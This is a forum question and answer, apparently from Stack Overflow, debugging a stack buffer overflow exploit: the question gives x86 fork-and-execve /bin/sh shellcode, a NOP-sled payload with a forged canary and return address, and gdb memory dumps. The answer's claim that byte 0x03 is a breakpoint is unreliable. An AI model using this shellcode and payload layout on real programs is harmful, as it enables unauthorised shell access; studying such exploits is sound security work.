buffer overflow-seg fault

Question

I am trying to overflow a buffer, which has a size of 0x201 bytes, and get a shellcode. The program that contains the buffer,there is a call to ptrace() (on itself), therefore the shellcode I'm using calls fork and then execve() (as a child process)

So, here is what I'm feeding the buffer:

payload5="\x6a\x32\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x02\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"

canary=struct.pack('L', 3)
ret_addr=\x10\xda\xff\xff
s=50

buf=("\x90" * (buf_lenlen(payload5)s))+payload5+"\x90"*s+canary+"\x90"*4+ret_addr

Here is how my buffer looks like right after strcpy():

0xffffd9e0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffd9f0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffda00: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffda10: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffda20: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffda30: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffda40: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffda50: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffda60: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffda70: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffda80: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffda90: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffdaa0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffdab0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffdac0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffdad0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffdae0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffdaf0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffdb00: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffdb10: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffdb20: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffdb30: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffdb40: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffdb50: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffdb60: 0x90909090  0x90909090  0x90909090  0x6a909090
0xffffdb70: 0xcd995832  0x89c38980  0x58466ac1  0x02b080cd
0xffffdb80: 0x0bb080cd  0x2f6e6852  0x2f686873  0x8969622f
0xffffdb90: 0xcdd189e3  0x90909080  0x90909090  0x90909090
0xffffdba0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffdbb0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffdbc0: 0x90909090  0x03909090  0x90909090  0xffffda10

and I am definitely correctly overwriting the eip:

Stack level 0, frame at 0xffffdbd0:
eip = 0x8048595 in vulnerable; saved eip = 0xffffda10
called by frame at 0x90909098
Arglist at 0xffffdbc8, args: 
Locals at 0xffffdbc8, Previous frame's sp is 0xffffdbd0
Saved registers:
   ebp at 0xffffdbc8, eip at 0xffffdbcc`

The problem is that I am segfaulting at 0xffffdbc6 which goes past my return address.

(gdb) x/i 0xffffdbc6
=> 0xffffdbc6:  add    %ch,0x6e(%ecx)

I get the shell in gdb if i set follow-fork-mode child, and avoid segfaulting. But, when I call the actual program, I never get the shell (jobs -l Segmentation fault).

I would think that the problem is with shellcode, when I used regular execve shellcode, my shell would just be killed (no segfault), but exactly the same shellcode has proven to work.

So, I really don't know where the problem is...

Answer 1

So, I can't comment yet and I don't have the full answer but it appears that your program is segfaulting within your nopsled. I think you are incorrect in stating that 0xffffdbc6 is past your return address.

0xffffdbc0: 0x90909090  0x03909090  0x90909090  0xffffda10

Is what you list as the bottom of your stack ?

Here is it rewritten:

0xffffdbc0: 0x90909090  
0xffffdbc4: 0x03909090
0xffffdbc8: 0x90909090
0xffffdbcc: 0xffffda10

So, 0xffffdbc6 is NOT past your return address.

Could be wrong on this but I don't think I am. Isn't 0x03 a breakpoint?

Could it be causing you issues when you run the shellcode? Maybe your shellcode doesn't exit gracefully, and so it's crashing even though you are forking.

Anyways hope this helps.